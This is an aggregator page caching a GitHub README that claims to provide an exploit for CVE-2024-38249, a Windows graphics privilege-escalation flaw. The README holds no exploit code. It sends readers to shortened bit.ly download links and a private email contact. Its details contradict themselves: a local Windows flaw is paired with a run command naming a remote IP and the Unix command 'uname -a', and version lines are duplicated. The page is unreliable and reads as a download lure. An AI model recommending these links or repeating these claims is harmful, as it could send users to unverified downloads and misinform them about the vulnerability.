Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-38249 PoC — Microsoft Graphics Component 资源管理错误漏洞

Source
https://github.com/Jaden1419/CVE-2024-38249
Associated Vulnerability
Title:Microsoft Graphics Component 资源管理错误漏洞 (CVE-2024-38249)
Description:Microsoft Graphics Component是美国微软(Microsoft)公司的图形驱动组件。 Microsoft Graphics Component存在资源管理错误漏洞。攻击者利用该漏洞可以提升权限。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Syste
Readme
# Microsoft Windows BeginPaint Brush Use-After-Free Local Privilege Escalation Vulnerability - CVE-2024-38249
## Overview
The CVE-2024-38249 vulnerability, officially titled "Windows Graphics Component Elevation of Privilege Vulnerability," has been identified and published by Microsoft. It is a significant security concern affecting various versions of Windows operating systems, leading to potential elevation of privilege. This issue leverages a 'Use After Free' condition in the Windows Graphics Component, categorized under CWE-416.
## Exploit
### [Download here](https://bit.ly/4hxG7ME)
## Details

+ **CVE ID**:	CVE-2024-38249
+ **Published**: 2024-09-26
+ **Impact**: Confidentiality
+ **CVSS SCORE**:	8.8
+ **Exploit Availability**: Not public, only private.
## Vulnurable details
This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
The specific flaw exists within the win32kfull driver. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.
## Affected versions
Windows 10 1507
Windows 10 1607
Windows 10 1809
Windows 10 21h2
Windows 10 21h2
Windows 10 22h2
Windows 10 22h2
Windows 11 21h2
Windows 11 21h2
Windows 11 22h2
Windows 11 22h2
Windows 11 23h2
Windows 11 23h2
Windows 11 24h2
Windows 11 24h2
Windows Server 2008
Windows Server 2008 R2
Windows Server 2008 Sp2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
Windows Server 2019
Windows Server 2022
Windows Server 2022 23h2
Windows Server 23h2
## Running
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact: GordonPoool@hotmail.com
### [Download here](https://bit.ly/3AezLRM) (Only 4 hands)

![CVE-2024-38249](https://github.com/user-attachments/assets/df73c94c-3c98-4496-b1d2-b548e262bff6)
File Snapshot

 [4.0K]  /data/pocs/83047e20c7ed259aa685970c62446af1ed631501
├── [ 14K]  CVE-2024-38249.png
└── [2.1K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.